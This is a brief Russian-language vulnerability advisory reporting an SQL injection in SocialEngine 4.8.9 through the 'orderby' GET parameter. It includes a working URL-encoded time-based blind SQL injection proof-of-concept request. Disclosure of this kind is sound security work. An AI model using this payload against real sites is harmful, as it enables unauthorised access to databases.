High-Tech Bridge Research Lab Security обнаружили sql-инъекцию в SocialEngine 4.8.9 SQL-инъекция происходит из-за недостаточной фильтрации входных данных, передаваемых через "OrderBy" HTTP GET параметра на "/index.php" . Код: http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29